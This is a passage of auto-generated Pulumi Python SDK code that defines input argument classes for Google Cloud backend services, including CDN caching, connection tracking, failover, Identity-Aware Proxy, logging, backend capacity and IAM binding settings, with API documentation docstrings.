Serve existing content from the cache (if available) when revalidating content with the origin, or when an error is encountered when refreshing the cache. This setting defines the default "max-stale" duration for any cached responses that do not specify a max-stale directive. Stale responses that exceed the TTL configured here will not be served. The default limit (max-stale) is 86400s (1 day), which will allow stale content to be served up to this limit beyond the max-age (or s-max-age) of a cached response. The maximum allowed value is 604800 (1 week). Set this to zero (0) to disable serve-while-stale.
"""
return pulumi.get(self, "serve_while_stale")
@serve_while_stale.setter
def serve_while_stale(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "serve_while_stale", value)
@property
@pulumi.getter(name="signedUrlCacheMaxAgeSec")
def signed_url_cache_max_age_sec(self) -> Optional[pulumi.Input[str]]:
"""
Maximum number of seconds the response to a signed URL request will be considered fresh. After this time period, the response will be revalidated before being served. Defaults to 1hr (3600s). When serving responses to signed URL requests, Cloud CDN will internally behave as though all responses from this backend had a "Cache-Control: public, max-age=[TTL]" header, regardless of any existing Cache-Control header. The actual headers served in responses will not be altered.
"""
return pulumi.get(self, "signed_url_cache_max_age_sec")
@signed_url_cache_max_age_sec.setter
def signed_url_cache_max_age_sec(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "signed_url_cache_max_age_sec", value)
@pulumi.input_type
class BackendServiceConnectionTrackingPolicyArgs:
def __init__(__self__, *,
connection_persistence_on_unhealthy_backends: Optional[pulumi.Input['BackendServiceConnectionTrackingPolicyConnectionPersistenceOnUnhealthyBackends']] = None,
enable_strong_affinity: Optional[pulumi.Input[bool]] = None,
idle_timeout_sec: Optional[pulumi.Input[int]] = None,
tracking_mode: Optional[pulumi.Input['BackendServiceConnectionTrackingPolicyTrackingMode']] = None):
"""
Connection Tracking configuration for this BackendService.
:param pulumi.Input['BackendServiceConnectionTrackingPolicyConnectionPersistenceOnUnhealthyBackends'] connection_persistence_on_unhealthy_backends: Specifies connection persistence when backends are unhealthy. The default value is DEFAULT_FOR_PROTOCOL. If set to DEFAULT_FOR_PROTOCOL, the existing connections persist on unhealthy backends only for connection-oriented protocols (TCP and SCTP) and only if the Tracking Mode is PER_CONNECTION (default tracking mode) or the Session Affinity is configured for 5-tuple. They do not persist for UDP. If set to NEVER_PERSIST, after a backend becomes unhealthy, the existing connections on the unhealthy backend are never persisted on the unhealthy backend. They are always diverted to newly selected healthy backends (unless all backends are unhealthy). If set to ALWAYS_PERSIST, existing connections always persist on unhealthy backends regardless of protocol and session affinity. It is generally not recommended to use this mode overriding the default. For more details, see [Connection Persistence for Network Load Balancing](https://cloud.google.com/load-balancing/docs/network/networklb-backend-service#connection-persistence) and [Connection Persistence for Internal TCP/UDP Load Balancing](https://cloud.google.com/load-balancing/docs/internal#connection-persistence).
:param pulumi.Input[bool] enable_strong_affinity: Enable Strong Session Affinity for Network Load Balancing. This option is not available publicly.
:param pulumi.Input[int] idle_timeout_sec: Specifies how long to keep a Connection Tracking entry while there is no matching traffic (in seconds). For Internal TCP/UDP Load Balancing: - The minimum (default) is 10 minutes and the maximum is 16 hours. - It can be set only if Connection Tracking is less than 5-tuple (i.e. Session Affinity is CLIENT_IP_NO_DESTINATION, CLIENT_IP or CLIENT_IP_PROTO, and Tracking Mode is PER_SESSION). For Network Load Balancer the default is 60 seconds. This option is not available publicly.
:param pulumi.Input['BackendServiceConnectionTrackingPolicyTrackingMode'] tracking_mode: Specifies the key used for connection tracking. There are two options: - PER_CONNECTION: This is the default mode. The Connection Tracking is performed as per the Connection Key (default Hash Method) for the specific protocol. - PER_SESSION: The Connection Tracking is performed as per the configured Session Affinity. It matches the configured Session Affinity. For more details, see [Tracking Mode for Network Load Balancing](https://cloud.google.com/load-balancing/docs/network/networklb-backend-service#tracking-mode) and [Tracking Mode for Internal TCP/UDP Load Balancing](https://cloud.google.com/load-balancing/docs/internal#tracking-mode).
"""
if connection_persistence_on_unhealthy_backends is not None:
pulumi.set(__self__, "connection_persistence_on_unhealthy_backends", connection_persistence_on_unhealthy_backends)
if enable_strong_affinity is not None:
pulumi.set(__self__, "enable_strong_affinity", enable_strong_affinity)
if idle_timeout_sec is not None:
pulumi.set(__self__, "idle_timeout_sec", idle_timeout_sec)
if tracking_mode is not None:
pulumi.set(__self__, "tracking_mode", tracking_mode)
@property
@pulumi.getter(name="connectionPersistenceOnUnhealthyBackends")
def connection_persistence_on_unhealthy_backends(self) -> Optional[pulumi.Input['BackendServiceConnectionTrackingPolicyConnectionPersistenceOnUnhealthyBackends']]:
"""
Specifies connection persistence when backends are unhealthy. The default value is DEFAULT_FOR_PROTOCOL. If set to DEFAULT_FOR_PROTOCOL, the existing connections persist on unhealthy backends only for connection-oriented protocols (TCP and SCTP) and only if the Tracking Mode is PER_CONNECTION (default tracking mode) or the Session Affinity is configured for 5-tuple. They do not persist for UDP. If set to NEVER_PERSIST, after a backend becomes unhealthy, the existing connections on the unhealthy backend are never persisted on the unhealthy backend. They are always diverted to newly selected healthy backends (unless all backends are unhealthy). If set to ALWAYS_PERSIST, existing connections always persist on unhealthy backends regardless of protocol and session affinity. It is generally not recommended to use this mode overriding the default. For more details, see [Connection Persistence for Network Load Balancing](https://cloud.google.com/load-balancing/docs/network/networklb-backend-service#connection-persistence) and [Connection Persistence for Internal TCP/UDP Load Balancing](https://cloud.google.com/load-balancing/docs/internal#connection-persistence).
"""
return pulumi.get(self, "connection_persistence_on_unhealthy_backends")
@connection_persistence_on_unhealthy_backends.setter
def connection_persistence_on_unhealthy_backends(self, value: Optional[pulumi.Input['BackendServiceConnectionTrackingPolicyConnectionPersistenceOnUnhealthyBackends']]):
pulumi.set(self, "connection_persistence_on_unhealthy_backends", value)
@property
@pulumi.getter(name="enableStrongAffinity")
def enable_strong_affinity(self) -> Optional[pulumi.Input[bool]]:
"""
Enable Strong Session Affinity for Network Load Balancing. This option is not available publicly.
"""
return pulumi.get(self, "enable_strong_affinity")
@enable_strong_affinity.setter
def enable_strong_affinity(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_strong_affinity", value)
@property
@pulumi.getter(name="idleTimeoutSec")
def idle_timeout_sec(self) -> Optional[pulumi.Input[int]]:
"""
Specifies how long to keep a Connection Tracking entry while there is no matching traffic (in seconds). For Internal TCP/UDP Load Balancing: - The minimum (default) is 10 minutes and the maximum is 16 hours. - It can be set only if Connection Tracking is less than 5-tuple (i.e. Session Affinity is CLIENT_IP_NO_DESTINATION, CLIENT_IP or CLIENT_IP_PROTO, and Tracking Mode is PER_SESSION). For Network Load Balancer the default is 60 seconds. This option is not available publicly.
"""
return pulumi.get(self, "idle_timeout_sec")
@idle_timeout_sec.setter
def idle_timeout_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "idle_timeout_sec", value)
@property
@pulumi.getter(name="trackingMode")
def tracking_mode(self) -> Optional[pulumi.Input['BackendServiceConnectionTrackingPolicyTrackingMode']]:
"""
Specifies the key used for connection tracking. There are two options: - PER_CONNECTION: This is the default mode. The Connection Tracking is performed as per the Connection Key (default Hash Method) for the specific protocol. - PER_SESSION: The Connection Tracking is performed as per the configured Session Affinity. It matches the configured Session Affinity. For more details, see [Tracking Mode for Network Load Balancing](https://cloud.google.com/load-balancing/docs/network/networklb-backend-service#tracking-mode) and [Tracking Mode for Internal TCP/UDP Load Balancing](https://cloud.google.com/load-balancing/docs/internal#tracking-mode).
"""
return pulumi.get(self, "tracking_mode")
@tracking_mode.setter
def tracking_mode(self, value: Optional[pulumi.Input['BackendServiceConnectionTrackingPolicyTrackingMode']]):
pulumi.set(self, "tracking_mode", value)
@pulumi.input_type
class BackendServiceFailoverPolicyArgs:
def __init__(__self__, *,
disable_connection_drain_on_failover: Optional[pulumi.Input[bool]] = None,
drop_traffic_if_unhealthy: Optional[pulumi.Input[bool]] = None,
failover_ratio: Optional[pulumi.Input[float]] = None):
"""
For load balancers that have configurable failover: [Internal TCP/UDP Load Balancing](https://cloud.google.com/load-balancing/docs/internal/failover-overview) and [external TCP/UDP Load Balancing](https://cloud.google.com/load-balancing/docs/network/networklb-failover-overview). On failover or failback, this field indicates whether connection draining will be honored. Google Cloud has a fixed connection draining timeout of 10 minutes. A setting of true terminates existing TCP connections to the active pool during failover and failback, immediately draining traffic. A setting of false allows existing TCP connections to persist, even on VMs no longer in the active pool, for up to the duration of the connection draining timeout (10 minutes).
:param pulumi.Input[bool] disable_connection_drain_on_failover: This can be set to true only if the protocol is TCP. The default is false.
:param pulumi.Input[bool] drop_traffic_if_unhealthy: If set to true, connections to the load balancer are dropped when all primary and all backup backend VMs are unhealthy.If set to false, connections are distributed among all primary VMs when all primary and all backup backend VMs are unhealthy. For load balancers that have configurable failover: [Internal TCP/UDP Load Balancing](https://cloud.google.com/load-balancing/docs/internal/failover-overview) and [external TCP/UDP Load Balancing](https://cloud.google.com/load-balancing/docs/network/networklb-failover-overview). The default is false.
:param pulumi.Input[float] failover_ratio: The value of the field must be in the range [0, 1]. If the value is 0, the load balancer performs a failover when the number of healthy primary VMs equals zero. For all other values, the load balancer performs a failover when the total number of healthy primary VMs is less than this ratio. For load balancers that have configurable failover: [Internal TCP/UDP Load Balancing](https://cloud.google.com/load-balancing/docs/internal/failover-overview) and [external TCP/UDP Load Balancing](https://cloud.google.com/load-balancing/docs/network/networklb-failover-overview).
"""
if disable_connection_drain_on_failover is not None:
pulumi.set(__self__, "disable_connection_drain_on_failover", disable_connection_drain_on_failover)
if drop_traffic_if_unhealthy is not None:
pulumi.set(__self__, "drop_traffic_if_unhealthy", drop_traffic_if_unhealthy)
if failover_ratio is not None:
pulumi.set(__self__, "failover_ratio", failover_ratio)
@property
@pulumi.getter(name="disableConnectionDrainOnFailover")
def disable_connection_drain_on_failover(self) -> Optional[pulumi.Input[bool]]:
"""
This can be set to true only if the protocol is TCP. The default is false.
"""
return pulumi.get(self, "disable_connection_drain_on_failover")
@disable_connection_drain_on_failover.setter
def disable_connection_drain_on_failover(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disable_connection_drain_on_failover", value)
@property
@pulumi.getter(name="dropTrafficIfUnhealthy")
def drop_traffic_if_unhealthy(self) -> Optional[pulumi.Input[bool]]:
"""
If set to true, connections to the load balancer are dropped when all primary and all backup backend VMs are unhealthy.If set to false, connections are distributed among all primary VMs when all primary and all backup backend VMs are unhealthy. For load balancers that have configurable failover: [Internal TCP/UDP Load Balancing](https://cloud.google.com/load-balancing/docs/internal/failover-overview) and [external TCP/UDP Load Balancing](https://cloud.google.com/load-balancing/docs/network/networklb-failover-overview). The default is false.
"""
return pulumi.get(self, "drop_traffic_if_unhealthy")
@drop_traffic_if_unhealthy.setter
def drop_traffic_if_unhealthy(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "drop_traffic_if_unhealthy", value)
@property
@pulumi.getter(name="failoverRatio")
def failover_ratio(self) -> Optional[pulumi.Input[float]]:
"""
The value of the field must be in the range [0, 1]. If the value is 0, the load balancer performs a failover when the number of healthy primary VMs equals zero. For all other values, the load balancer performs a failover when the total number of healthy primary VMs is less than this ratio. For load balancers that have configurable failover: [Internal TCP/UDP Load Balancing](https://cloud.google.com/load-balancing/docs/internal/failover-overview) and [external TCP/UDP Load Balancing](https://cloud.google.com/load-balancing/docs/network/networklb-failover-overview).
"""
return pulumi.get(self, "failover_ratio")
@failover_ratio.setter
def failover_ratio(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "failover_ratio", value)
@pulumi.input_type
class BackendServiceIAPArgs:
def __init__(__self__, *,
enabled: Optional[pulumi.Input[bool]] = None,
oauth2_client_id: Optional[pulumi.Input[str]] = None,
oauth2_client_secret: Optional[pulumi.Input[str]] = None):
"""
Identity-Aware Proxy
:param pulumi.Input[bool] enabled: Whether the serving infrastructure will authenticate and authorize all incoming requests. If true, the oauth2ClientId and oauth2ClientSecret fields must be non-empty.
:param pulumi.Input[str] oauth2_client_id: OAuth2 client ID to use for the authentication flow.
:param pulumi.Input[str] oauth2_client_secret: OAuth2 client secret to use for the authentication flow. For security reasons, this value cannot be retrieved via the API. Instead, the SHA-256 hash of the value is returned in the oauth2ClientSecretSha256 field. @InputOnly
"""
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if oauth2_client_id is not None:
pulumi.set(__self__, "oauth2_client_id", oauth2_client_id)
if oauth2_client_secret is not None:
pulumi.set(__self__, "oauth2_client_secret", oauth2_client_secret)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the serving infrastructure will authenticate and authorize all incoming requests. If true, the oauth2ClientId and oauth2ClientSecret fields must be non-empty.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="oauth2ClientId")
def oauth2_client_id(self) -> Optional[pulumi.Input[str]]:
"""
OAuth2 client ID to use for the authentication flow.
"""
return pulumi.get(self, "oauth2_client_id")
@oauth2_client_id.setter
def oauth2_client_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "oauth2_client_id", value)
@property
@pulumi.getter(name="oauth2ClientSecret")
def oauth2_client_secret(self) -> Optional[pulumi.Input[str]]:
"""
OAuth2 client secret to use for the authentication flow. For security reasons, this value cannot be retrieved via the API. Instead, the SHA-256 hash of the value is returned in the oauth2ClientSecretSha256 field. @InputOnly
"""
return pulumi.get(self, "oauth2_client_secret")
@oauth2_client_secret.setter
def oauth2_client_secret(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "oauth2_client_secret", value)
@pulumi.input_type
class BackendServiceLogConfigArgs:
def __init__(__self__, *,
enable: Optional[pulumi.Input[bool]] = None,
sample_rate: Optional[pulumi.Input[float]] = None):
"""
The available logging options for the load balancer traffic served by this backend service.
:param pulumi.Input[bool] enable: This field denotes whether to enable logging for the load balancer traffic served by this backend service.
:param pulumi.Input[float] sample_rate: This field can only be specified if logging is enabled for this backend service. The value of the field must be in [0, 1]. This configures the sampling rate of requests to the load balancer where 1.0 means all logged requests are reported and 0.0 means no logged requests are reported. The default value is 1.0.
"""
if enable is not None:
pulumi.set(__self__, "enable", enable)
if sample_rate is not None:
pulumi.set(__self__, "sample_rate", sample_rate)
@property
@pulumi.getter
def enable(self) -> Optional[pulumi.Input[bool]]:
"""
This field denotes whether to enable logging for the load balancer traffic served by this backend service.
"""
return pulumi.get(self, "enable")
@enable.setter
def enable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable", value)
@property
@pulumi.getter(name="sampleRate")
def sample_rate(self) -> Optional[pulumi.Input[float]]:
"""
This field can only be specified if logging is enabled for this backend service. The value of the field must be in [0, 1]. This configures the sampling rate of requests to the load balancer where 1.0 means all logged requests are reported and 0.0 means no logged requests are reported. The default value is 1.0.
"""
return pulumi.get(self, "sample_rate")
@sample_rate.setter
def sample_rate(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "sample_rate", value)
@pulumi.input_type
class BackendArgs:
def __init__(__self__, *,
balancing_mode: Optional[pulumi.Input['BackendBalancingMode']] = None,
capacity_scaler: Optional[pulumi.Input[float]] = None,
description: Optional[pulumi.Input[str]] = None,
failover: Optional[pulumi.Input[bool]] = None,
group: Optional[pulumi.Input[str]] = None,
max_connections: Optional[pulumi.Input[int]] = None,
max_connections_per_endpoint: Optional[pulumi.Input[int]] = None,
max_connections_per_instance: Optional[pulumi.Input[int]] = None,
max_rate: Optional[pulumi.Input[int]] = None,
max_rate_per_endpoint: Optional[pulumi.Input[float]] = None,
max_rate_per_instance: Optional[pulumi.Input[float]] = None,
max_utilization: Optional[pulumi.Input[float]] = None):
"""
Message containing information of one individual backend.
:param pulumi.Input['BackendBalancingMode'] balancing_mode: Specifies how to determine whether the backend of a load balancer can handle additional traffic or is fully loaded. For usage guidelines, see Connection balancing mode. Backends must use compatible balancing modes. For more information, see Supported balancing modes and target capacity settings and Restrictions and guidance for instance groups. Note: Currently, if you use the API to configure incompatible balancing modes, the configuration might be accepted even though it has no impact and is ignored. Specifically, Backend.maxUtilization is ignored when Backend.balancingMode is RATE. In the future, this incompatible combination will be rejected.
:param pulumi.Input[float] capacity_scaler: A multiplier applied to the backend's target capacity of its balancing mode. The default value is 1, which means the group serves up to 100% of its configured capacity (depending on balancingMode). A setting of 0 means the group is completely drained, offering 0% of its available capacity. The valid ranges are 0.0 and [0.1,1.0]. You cannot configure a setting larger than 0 and smaller than 0.1. You cannot configure a setting of 0 when there is only one backend attached to the backend service.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when you create the resource.
:param pulumi.Input[bool] failover: This field designates whether this is a failover backend. More than one failover backend can be configured for a given BackendService.
:param pulumi.Input[str] group: The fully-qualified URL of an instance group or network endpoint group (NEG) resource. To determine what types of backends a load balancer supports, see the [Backend services overview](https://cloud.google.com/load-balancing/docs/backend-service#backends). You must use the *fully-qualified* URL (starting with https://www.googleapis.com/) to specify the instance group or NEG. Partial URLs are not supported.
:param pulumi.Input[int] max_connections: Defines a target maximum number of simultaneous connections. For usage guidelines, see Connection balancing mode and Utilization balancing mode. Not available if the backend's balancingMode is RATE.
:param pulumi.Input[int] max_connections_per_endpoint: Defines a target maximum number of simultaneous connections. For usage guidelines, see Connection balancing mode and Utilization balancing mode. Not available if the backend's balancingMode is RATE.
:param pulumi.Input[int] max_connections_per_instance: Defines a target maximum number of simultaneous connections. For usage guidelines, see Connection balancing mode and Utilization balancing mode. Not available if the backend's balancingMode is RATE.
:param pulumi.Input[int] max_rate: Defines a maximum number of HTTP requests per second (RPS). For usage guidelines, see Rate balancing mode and Utilization balancing mode. Not available if the backend's balancingMode is CONNECTION.
:param pulumi.Input[float] max_rate_per_endpoint: Defines a maximum target for requests per second (RPS). For usage guidelines, see Rate balancing mode and Utilization balancing mode. Not available if the backend's balancingMode is CONNECTION.
:param pulumi.Input[float] max_rate_per_instance: Defines a maximum target for requests per second (RPS). For usage guidelines, see Rate balancing mode and Utilization balancing mode. Not available if the backend's balancingMode is CONNECTION.
:param pulumi.Input[float] max_utilization: Optional parameter to define a target capacity for the UTILIZATIONbalancing mode. The valid range is [0.0, 1.0]. For usage guidelines, see Utilization balancing mode.
"""
if balancing_mode is not None:
pulumi.set(__self__, "balancing_mode", balancing_mode)
if capacity_scaler is not None:
pulumi.set(__self__, "capacity_scaler", capacity_scaler)
if description is not None:
pulumi.set(__self__, "description", description)
if failover is not None:
pulumi.set(__self__, "failover", failover)
if group is not None:
pulumi.set(__self__, "group", group)
if max_connections is not None:
pulumi.set(__self__, "max_connections", max_connections)
if max_connections_per_endpoint is not None:
pulumi.set(__self__, "max_connections_per_endpoint", max_connections_per_endpoint)
if max_connections_per_instance is not None:
pulumi.set(__self__, "max_connections_per_instance", max_connections_per_instance)
if max_rate is not None:
pulumi.set(__self__, "max_rate", max_rate)
if max_rate_per_endpoint is not None:
pulumi.set(__self__, "max_rate_per_endpoint", max_rate_per_endpoint)
if max_rate_per_instance is not None:
pulumi.set(__self__, "max_rate_per_instance", max_rate_per_instance)
if max_utilization is not None:
pulumi.set(__self__, "max_utilization", max_utilization)
@property
@pulumi.getter(name="balancingMode")
def balancing_mode(self) -> Optional[pulumi.Input['BackendBalancingMode']]:
"""
Specifies how to determine whether the backend of a load balancer can handle additional traffic or is fully loaded. For usage guidelines, see Connection balancing mode. Backends must use compatible balancing modes. For more information, see Supported balancing modes and target capacity settings and Restrictions and guidance for instance groups. Note: Currently, if you use the API to configure incompatible balancing modes, the configuration might be accepted even though it has no impact and is ignored. Specifically, Backend.maxUtilization is ignored when Backend.balancingMode is RATE. In the future, this incompatible combination will be rejected.
"""
return pulumi.get(self, "balancing_mode")
@balancing_mode.setter
def balancing_mode(self, value: Optional[pulumi.Input['BackendBalancingMode']]):
pulumi.set(self, "balancing_mode", value)
@property
@pulumi.getter(name="capacityScaler")
def capacity_scaler(self) -> Optional[pulumi.Input[float]]:
"""
A multiplier applied to the backend's target capacity of its balancing mode. The default value is 1, which means the group serves up to 100% of its configured capacity (depending on balancingMode). A setting of 0 means the group is completely drained, offering 0% of its available capacity. The valid ranges are 0.0 and [0.1,1.0]. You cannot configure a setting larger than 0 and smaller than 0.1. You cannot configure a setting of 0 when there is only one backend attached to the backend service.
"""
return pulumi.get(self, "capacity_scaler")
@capacity_scaler.setter
def capacity_scaler(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "capacity_scaler", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource. Provide this property when you create the resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def failover(self) -> Optional[pulumi.Input[bool]]:
"""
This field designates whether this is a failover backend. More than one failover backend can be configured for a given BackendService.
"""
return pulumi.get(self, "failover")
@failover.setter
def failover(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "failover", value)
@property
@pulumi.getter
def group(self) -> Optional[pulumi.Input[str]]:
"""
The fully-qualified URL of an instance group or network endpoint group (NEG) resource. To determine what types of backends a load balancer supports, see the [Backend services overview](https://cloud.google.com/load-balancing/docs/backend-service#backends). You must use the *fully-qualified* URL (starting with https://www.googleapis.com/) to specify the instance group or NEG. Partial URLs are not supported.
"""
return pulumi.get(self, "group")
@group.setter
def group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group", value)
@property
@pulumi.getter(name="maxConnections")
def max_connections(self) -> Optional[pulumi.Input[int]]:
"""
Defines a target maximum number of simultaneous connections. For usage guidelines, see Connection balancing mode and Utilization balancing mode. Not available if the backend's balancingMode is RATE.
"""
return pulumi.get(self, "max_connections")
@max_connections.setter
def max_connections(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_connections", value)
@property
@pulumi.getter(name="maxConnectionsPerEndpoint")
def max_connections_per_endpoint(self) -> Optional[pulumi.Input[int]]:
"""
Defines a target maximum number of simultaneous connections. For usage guidelines, see Connection balancing mode and Utilization balancing mode. Not available if the backend's balancingMode is RATE.
"""
return pulumi.get(self, "max_connections_per_endpoint")
@max_connections_per_endpoint.setter
def max_connections_per_endpoint(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_connections_per_endpoint", value)
@property
@pulumi.getter(name="maxConnectionsPerInstance")
def max_connections_per_instance(self) -> Optional[pulumi.Input[int]]:
"""
Defines a target maximum number of simultaneous connections. For usage guidelines, see Connection balancing mode and Utilization balancing mode. Not available if the backend's balancingMode is RATE.
"""
return pulumi.get(self, "max_connections_per_instance")
@max_connections_per_instance.setter
def max_connections_per_instance(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_connections_per_instance", value)
@property
@pulumi.getter(name="maxRate")
def max_rate(self) -> Optional[pulumi.Input[int]]:
"""
Defines a maximum number of HTTP requests per second (RPS). For usage guidelines, see Rate balancing mode and Utilization balancing mode. Not available if the backend's balancingMode is CONNECTION.
"""
return pulumi.get(self, "max_rate")
@max_rate.setter
def max_rate(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_rate", value)
@property
@pulumi.getter(name="maxRatePerEndpoint")
def max_rate_per_endpoint(self) -> Optional[pulumi.Input[float]]:
"""
Defines a maximum target for requests per second (RPS). For usage guidelines, see Rate balancing mode and Utilization balancing mode. Not available if the backend's balancingMode is CONNECTION.
"""
return pulumi.get(self, "max_rate_per_endpoint")
@max_rate_per_endpoint.setter
def max_rate_per_endpoint(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "max_rate_per_endpoint", value)
@property
@pulumi.getter(name="maxRatePerInstance")
def max_rate_per_instance(self) -> Optional[pulumi.Input[float]]:
"""
Defines a maximum target for requests per second (RPS). For usage guidelines, see Rate balancing mode and Utilization balancing mode. Not available if the backend's balancingMode is CONNECTION.
"""
return pulumi.get(self, "max_rate_per_instance")
@max_rate_per_instance.setter
def max_rate_per_instance(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "max_rate_per_instance", value)
@property
@pulumi.getter(name="maxUtilization")
def max_utilization(self) -> Optional[pulumi.Input[float]]:
"""
Optional parameter to define a target capacity for the UTILIZATIONbalancing mode. The valid range is [0.0, 1.0]. For usage guidelines, see Utilization balancing mode.
"""
return pulumi.get(self, "max_utilization")
@max_utilization.setter
def max_utilization(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "max_utilization", value)
@pulumi.input_type
class BindingArgs:
def __init__(__self__, *,
binding_id: Optional[pulumi.Input[str]] = None,
condition: Optional[pulumi.Input['ExprArgs']] = None,
members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
role: Optional[pulumi.Input[str]] = None):
"""
Associates `members`, or principals, with a `role`.
:param pulumi.Input[str] binding_id: This is deprecated and has no effect. Do not use.
:param pulumi.Input['ExprArgs'] condition: The condition that is associated with this binding. If the condition evaluates to `true`, then this binding applies to the current request. If the condition evaluates to `false`, then this binding does not apply to the current request. However, a different role binding might grant the same role to one or more of the principals in this binding. To learn which resources support conditions in their IAM policies, see the [IAM documentation](https://cloud.google.com/iam/help/conditions/resource-policies).
:param pulumi.Input[Sequence[pulumi.Input[str]]] members: Specifies the principals requesting access for a Cloud Platform resource. `members` can have the following values: * `allUsers`: A special identifier that represents anyone who is on the internet; with or without a Google account. * `allAuthenticatedUsers`: A special identifier that represents anyone who is authenticated with a Google account or a service account. * `user:{emailid}`: An email address that represents a specific Google account. For example, `alice@example.com` . * `serviceAccount:{emailid}`: An email address that represents a service account. For example, `my-other-app@appspot.gserviceaccount.com`. * `group:{emailid}`: An email address that represents a Google group. For example, `admins@example.com`. * `deleted:user:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a user that has been recently deleted. For example, `alice@example.com?uid=123456789012345678901`. If the user is recovered, this value reverts to `user:{emailid}` and the recovered user retains the role in the binding. * `deleted:serviceAccount:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a service account that has been recently deleted. For example, `my-other-app@appspot.gserviceaccount.com?uid=123456789012345678901`. If the service account is undeleted, this value reverts to `serviceAccount:{emailid}` and the undeleted service account retains the role in the binding. * `deleted:group:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a Google group that has been recently deleted. For example, `admins@example.com?uid=123456789012345678901`. If the group is recovered, this value reverts to `group:{emailid}` and the recovered group retains the role in the binding. * `domain:{domain}`: The G Suite domain (primary) that represents all the users of that domain. For example, `google.com` or `example.com`.
:param pulumi.Input[str] role: Role that is assigned to the list of `members`, or principals. For example, `roles/viewer`, `roles/editor`, or `roles/owner`.
"""
if binding_id is not None:
pulumi.set(__self__, "binding_id", binding_id)
if condition is not None:
pulumi.set(__self__, "condition", condition)
if members is not None:
pulumi.set(__self__, "members", members)
if role is not None:
pulumi.set(__self__, "role", role)
@property
@pulumi.getter(name="bindingId")
def binding_id(self) -> Optional[pulumi.Input[str]]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "binding_id")
@binding_id.setter
def binding_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "binding_id", value)
@property
@pulumi.getter
def condition(self) -> Optional[pulumi.Input['ExprArgs']]:
"""
The condition that is associated with this binding. If the condition evaluates to `true`, then this binding applies to the current request. If the condition evaluates to `false`, then this binding does not apply to the current request. However, a different role binding might grant the same role to one or more of the principals in this binding. To learn which resources support conditions in their IAM policies, see the [IAM documentation](https://cloud.google.com/iam/help/conditions/resource-policies).
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: Optional[pulumi.Input['ExprArgs']]):
pulumi.set(self, "condition", value)
@property
@pulumi.getter
def members(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies the principals requesting access for a Cloud Platform resource. `members` can have the following values: * `allUsers`: A special identifier that represents anyone who is on the internet; with or without a Google account. * `allAuthenticatedUsers`: A special identifier that represents anyone who is authenticated with a Google account or a service account. * `user:{emailid}`: An email address that represents a specific Google account. For example, `alice@example.com` . * `serviceAccount:{emailid}`: An email address that represents a service account. For example, `my-other-app@appspot.gserviceaccount.com`. * `group:{emailid}`: An email address that represents a Google group. For example, `admins@example.com`. * `deleted:user:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a user that has been recently deleted. For example, `alice@example.com?uid=123456789012345678901`. If the user is recovered, this value reverts to `user:{emailid}` and the recovered user retains the role in the binding. * `deleted:serviceAccount:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a service account that has been recently deleted. For example, `my-other-app@appspot.gserviceaccount.com?uid=123456789012345678901`. If the service account is undeleted, this value reverts to `serviceAccount:{emailid}` and the undeleted service account retains the role in the binding. * `deleted:group:{emailid}?uid={uniqueid}`: An email address (plus unique identifier) representing a Google group that has been recently deleted. For example, `admins@example.com?uid=123456789012345678901`. If the group is recovered, this value reverts to `group:{emailid}` and the recovered group retains the role in the binding. * `domain:{domain}`: The G Suite domain (primary) that represents all the users of that domain. For example, `google.com` or `example.com`.
"""
return pulumi.get(self, "members")
@members.setter
def members(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "members", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
Role that is assigned to the list of `members`, or principals. For example, `roles/viewer`, `roles/editor`, or `roles/owner`.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
@pulumi.input_type
class CacheKeyPolicyArgs:
def __init__(__self__, *,
include_host: Optional[pulumi.Input[bool]] = None,
include_http_headers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
include_named_cookies: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
include_protocol: Optional[pulumi.Input[bool]] = None,
include_query_string: Optional[pulumi.Input[bool]] = None,
query_string_blacklist: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
